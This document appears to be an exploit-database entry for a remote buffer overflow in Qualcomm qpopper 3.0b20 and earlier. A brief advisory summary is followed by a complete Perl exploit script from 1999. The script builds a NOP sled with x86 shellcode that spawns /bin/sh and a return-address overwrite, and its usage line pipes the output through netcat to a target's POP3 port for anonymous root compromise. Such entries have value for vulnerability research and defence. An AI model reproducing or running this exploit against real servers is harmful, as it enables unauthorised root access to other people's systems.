Qualcomm qpopper 3.0/3.0 b20 - Remote Buffer Overflow (2)

source: https://www.securityfocus.com/bid/830/info
 
There is a buffer overflow vulnerability present in current (3.x) versions of Qualcomm popper daemon. These vulnerabilities are remotely exploitable and since the daemon runs as root, the host running qpopper can be completely compromised anonymously. The problem is in pop_msg.c, around line 68 and is the result of vsprintf() or sprintf() calls without bounds checking.

#!/usr/bin/perl
# *** Synnergy Networks

# * Description:
#
# Remote buffer overflow exploit for QPOP 3.0b<=20 
# running on Linux.
# (based on code by [email protected])

# * Author:
#
# headflux ([email protected])
# Synnergy Networks (c) 1999,  http://www.synnergy.net

# * Usage:
# ./qpop-linux.pl <offset> | nc -v <hostname> 110

# *** Synnergy Networks

$nop    = "\x90";
#$offset        = 0;

$shell  = "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa";
$shell  .= "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04";
$shell  .= "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff";
$shell  .= "\xff\xff/bin/sh";

#$i     = 0;
$buflen = 990;
$ret    = 0xbfffd304;
$cmd    = "AUTH ";

if(defined $ARGV[0])
{
        $offset = $ARGV[0];
}

$buf = $nop x $buflen;
substr($buf, 0, length($cmd))		= "$cmd";
substr($buf, 800, length($shell))       = "$shell";

for ($i=800+length($shell) + 2; $i < $buflen - 4; $i += 4)
{
        substr($buf, $i, length($ret + offset)) = pack(l,$ret + $offset);
}

# substr($buf, $buflen - 2, 1)  = "\n";
# substr($buf, $buflen - 1, 1)  = "\n";

#$buf   .= "\n";

printf STDOUT "$buf\n";

# EndOfFile